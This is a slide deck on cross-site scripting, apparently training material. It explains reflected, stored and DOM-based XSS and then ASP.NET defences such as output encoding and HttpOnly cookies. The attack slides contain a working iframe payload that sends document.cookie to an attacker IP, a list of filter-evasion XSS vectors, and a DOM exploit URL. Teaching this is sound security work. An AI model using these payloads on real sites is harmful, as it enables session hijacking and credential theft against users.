XSS - Attacks & Defense

Cross Site Scripting
• A user’s credentials may be recovered by
another user.
• Inject client-side code as part of data content
stored on the server side.
– e.g. Javascript
• When a user views the stored content, the
client-side code executes on browser.
• Transmit the current credentials to the
attacker.

XSS types
• XSS is of three types
– Persistent
– Non Persistent
– DOM based

Non-persistent XSS
• Application echo backs response
• It can be over GET or POST
• Very common with application developers
• Features like search is common place for it
• Error handling routines are vulnerable to it as
well
• Attacker can inject stream in it
• Various tags can be injected

Non-persistent XSS
• Attack vectors are common
• Exploitation is possible
• Session hijacking with cookie retrieval is most
popular ways
• Links coming in the mail or social sites can
lead to XSS
• It is also known as type 1 OR reflected XSS

Anatomy of an XSS attack
Web
Server DB
DB
Web app
attacker
Web app
Web app
Web app
Web
Client
SESSION KEYS
78974369523
12323747677
NAME VALUE
username saumil
NAME VALUE
username arthur
inject <IFRAME> javascript
8008

Web
Server DB
DB
Web app
attacker
Web app
Web app
Web app
Web
Client
SESSION KEYS
78974369523
12323747677
84658734652
NAME VALUE
username saumil
NAME VALUE
username arthur
NAME VALUE
username nitesh
SESSID=84658734652
8008

Web
Server DB
DB
Web app
attacker
Web app
Web app
Web app
Web
Client
SESSION KEYS
78974369523
12323747677
84658734652
NAME VALUE
username saumil
NAME VALUE
username arthur
NAME VALUE
username nitesh
SESSID=84658734652
8008
<iframe src=
http://attacker/SESSID=84658734652>

Web
Server DB
DB
Web app
attacker
Web app
Web app
Web app
Web
Client
SESSION KEYS
78974369523
12323747677
84658734652
NAME VALUE
username saumil
NAME VALUE
username arthur
NAME VALUE
username nitesh
SESSID=84658734652
8008
<iframe src=
GET /SESSID=84658734652 HTTP/1.0
(happens automatically)

Web
Server DB
DB
Web app
attacker
Web app
Web app
Web app
Web
Client
SESSION KEYS
78974369523
12323747677
84658734652
NAME VALUE
username saumil
NAME VALUE
username arthur
NAME VALUE
username nitesh
SESSID=84658734652
8008
<iframe src=
SESSID=84658734652

What to inject - IFRAME example
• Inject a 1x1 floating frame:
• When the frame is loaded, it will cause the
browser to make an automatic request.
• Requesting URL
http://192.168.7.41:8008/<cookie_value>
<script>document.write(“<iframe
src=”http://192.168.7.41:8008/”+document.cookie+””
width=1 height=1 frameborder=0></iframe>”);</script>

Persistent XSS
• In this XSS vector, attacker gets write access
on the application
• If application page can be loaded with
malicious code
• This code accessed by victim
• Code gets executed on the client machine
• XSS – credential stealing
• Examples – bulletin board, blogs etc.

XSS injection vectors
• Applications are filtering certain traffic
• Popular tags are filtered out as well
• Character filtering is in place
• There are various ways to inject vectors.

XSS vector
• ';alert(String.fromCharCode(88,83,83))//';aler
t(String.fromCharCode(88,83,83))//";alert(Stri
ng.fromCharCode(88,83,83))//";alert(String.fr
omCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromChar
Code(88,83,83))</SCRIPT>
• '';!--"<XSS>=&{()}

XSS vector
• <SCRIPT SRC=http://url/xss.js></SCRIPT>
• <IMG SRC="javascript:alert('XSS');">
• <IMG SRC=javascript:alert('XSS')>
• <IMG SRC=JaVaScRiPt:alert('XSS')>
• <IMG SRC=javascript:alert("XSS")>
• <IMG SRC=`javascript:alert("XSS")`>
• Image tag malformed - <IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">

XSS vector
• <IMG
SRC=javascript:alert(String.fromCharCode(88,
83,83))>
• Unicode encoding - <IMG
SRC=javasc
ript:a&#1
08;ert('X&#
83;S')>

XSS vector
• UTF-8 - <IMG
SRC=&#0000106&#0000097&#0000118&#000
0097&#0000115&#0000099&#0000114&#000
0105&#0000112&#0000116&#0000058&#000
0097&#0000108&#0000101&#0000114&#000
0116&#0000040&#0000039&#0000088&#000
0083&#0000083&#0000039&#0000041>

XSS vector
• Hex - <IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&
#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&
#x65&#x72&#x74&#x28&#x27&#x58&#x53&#
x53&#x27&#x29>
• XSS breakup - <IMG SRC="jav
ascript:alert('XSS');">
• <IMG SRC="jav	ascript:alert('XSS');">

XSS vector
• <IMG SRC="jav
ascript:alert('XSS');">
(line feed)
• <IMG SRC="javascript:alert('XSS');">
(carriage return)
• Multi-line injection

XSS vector
• <INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');">
• <BODY
BACKGROUND="javascript:alert('XSS')">
• <BODY ONLOAD=alert('XSS')>
• BR, Layer etc.
• <LINK REL="stylesheet"
HREF="javascript:alert('XSS');">
• HTTP-Equiv

XSS vector
• Iframe, Frameset & Table(background)
• Base tag
• Object tag XSS
• Embed – with flash
• XML namespace injection
• XML ID, SRC etc.

DOM based XSS
• Ajax based XSS is relatively new way of
attacking the client
• Code written on browser end can be
vulnerable to this attacks
• Various different structures can have their
own confusion
• Information processing from un-trusted
sources can lead to XSS

DOM based XSS
• Stream can be injected into the Ajax routine
• If function is vulnerable to XSS then it
executes the script
• Script can be coming in various forms
• Web 2.0 applications are consuming various
scripts and that makes it vulnerable to this set
of attacks

DOM based XSS
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf(“user=")+5;
document.write(document.URL.substring(pos,document.URL.
length));
</SCRIPT>
<BR>
Welcome to our system
…
</HTML>

DOM based XSS
http://www.target.com/profile.html?user=Jack
Exploit -
http://www.target.com/profile.html?user=
<script>alert(document.cookie)</script>

Web
Server DB
DB
Web app
attacker
Web app
Web app
proxy
Web
Client
8008
Third party source
Stream
eval()
XSS

DOM based XSS
if (http.readyState == 4) {
var response = http.responseText;
var p = eval("(" + response + ")");
document.open();
document.write(p.firstName+"<br>");
document.write(p.lastName+"<br>");
document.write(p.phoneNumbers[0]);
document.close();

Web
Server DB
DB
Web app
attacker
Web app
Web app
proxy
Web
Client
8008
XML
Stream
eval()
XSS

Web
Server DB
DB
Web app
attacker
Web app
Web app
proxy
Web
Client
8008
JSON
Stream
eval()
XSS

Web
Server DB
DB
Web app
attacker
Web app
Web app
proxy
Web
Client
8008
JS-Object / JS-Array / JS-Script
Stream
eval()
XSS

DOM based XSS
document.write(…)
document.writeln(…)
document.body.innerHtml=…
document.forms[0].action=…
document.attachEvent(…)
document.create…(…)
document.execCommand(…)
document.body. …
window.attachEvent(…)
document.location=…
document.location.hostname=…
document.location.replace(…)
document.location.assign(…)
document.URL=…
window.navigate(…)

DOM based XSS
document.open(…)
window.open(…)
window.location.href=… (and assigning to
location’s href, host and hostname)
eval(…)
window.execScript(…)
window.setInterval(…)
window.setTimeout(…)

Exploit and testing framework
• There are testing framework for XSS which
can be used during the testing
• CAL9000 – OWASP project
• BeeF – Browser exploit framework
• XSSproxy
• Few other out there

Prevent XSS
• Design Strategy
• Validate Input.
• Encode output variable data.
• Sanitizing Free Format Input.
• Set the correct character encoding.
• Use the ASP.NET validateRequest option.
• Use the HttpOnly cookie option.
• Use the <frame> security attribute.
• Use the innerText property.

Prevent XSS
• Encode output using HtmlEncode /
URLEncode methods.
• Do this even for user input, a database, or
a local file.
The HtmlEncode method replaces characters that have special meaning in
HTML to HTML variables that represent those characters. For example, <
is replaced with &lt and " is replaced with &quot. Encoded data does
not cause the browser to execute code. Instead, the data is rendered as
harmless HTML.
Response.Write(HttpUtility.HtmlEncode(Request.Form["name"]));

Prevent XSS
• Data-Bound Controls: DataGrid, DataList,
RadioButtonList and CheckBoxList do not
perform encoding,
• Turn all columns into templates and
manually use HtmlEncode()/UrlEncode() on
each call to DataBinder.Eval
• Override one of its DataBinding methods,
such as OnDatabinding or
OnItemDataBound and perform encoding
on its items.

Prevent XSS
• Allow Safe HTML like comments, blog
fields,
• Process it with HtmlEncode
• Remove encoding on selected safe
HTML tags
StringBuilder sb = new StringBuilder( HttpUtility.HtmlEncode(userInput)
) ;
sb.Replace("<b>", "<b>");
sb.Replace("</b>", "</b>");
sb.Replace("<i>", "<i>");
sb.Replace("</i>", "</i>");
Response.Write(sb.ToString());

Prevent XSS
• Set the Correct Character Encoding,
• Application / Page level
<meta http-equiv="Content Type"
content="text/html; charset=ISO-8859-1" />
OR
<% @ Page ResponseEncoding="ISO-8859-1" %>
To set the character encoding in Web.config, use the following
configuration:
<configuration>
<system.web>
<globalization
requestEncoding="ISO-8859-1"
responseEncoding="ISO-8859-1"/>
</system.web>
</configuration>

Prevent XSS
• Validating Unicode Characters,
using System.Text.RegularExpressions;
private void Page_Load(object sender, System.EventArgs e)
{
// Name must contain between 1 and 40 alphanumeric characters
// together with (optionally) special characters '`' for names such
// as D'Angelo
if (!Regex.IsMatch(Request.Form["name"], @"^[p{L}p{Zs}p{Lu}p{Ll}']{1,40}$"))
throw new ArgumentException("Invalid name parameter");
}
•{<name>} specifies a named Unicode character class.
•p{<name>} matches any character in the named character class specified by
{<name>}.
•{L} performs a left-to-right match.
•{Lu} performs a match of uppercase.
•{Ll} performs a match of lowercase.
•{Zs} matches separator and space.
•{1,40} means no less that 1 and no more than 40 characters.
•{Mn} matches mark and non-spacing characters.
•{Zs} matches separator and space.
•* specifies zero or more matches.
•$ means stop looking at this position.

Prevent XSS
• Use the ASP.NET validateRequest
Option,
• By default, it is TRUE
• Instruct ASP.NET to check for
malicious inputs like <script>, etc.
<% @ Page validateRequest="True" %>;

Prevent XSS
• Use the HttpOnly Cookie Option.
• prevents client-side script from
accessing the cookie from the
document.cookie property
protected void Application_EndRequest(Object sender, EventArgs e)
{
string authCookie = FormsAuthentication.FormsCookieName;
foreach (string sCookie in Response.Cookies)
{
if (sCookie.Equals(authCookie))
{
// Force HttpOnly to be added to the cookie header
Response.Cookies[sCookie].Path += ";HttpOnly";
}
}
}

Prevent XSS
• Use the <frame> Security Attribute,
• Use the innerText property instead of
innerHTML property.
<frame security="restricted"
src="http://www.somesite.com/somepage.htm"></frame>

Prevent XSS
• Use AntiXSS library,
//bad code
String Name = Request.QueryString["Name"];
//code with antixss library
String Name = AntiXss.HtmlEncode(Request.QueryString["Name"]);
namespace Microsoft.Application.Security
{
public class AntiXss
{
public static string HtmlEncode(string s);
public static string HtmlAttributeEncode(string s);
public static string JavaScriptEncode(string s);
public static string UrlEncode(string s);
public static string VisualBasicScriptEncode(string
s);
public static string XmlEncode(string s);
public static string XmlAttributeEncode(string s);
}
}

XSS - Attacks & Defense

More Related Content

What's hot

Viewers also liked

Similar to XSS - Attacks & Defense

More from Blueinfy Solutions

Recently uploaded

XSS - Attacks & Defense

Editor's Notes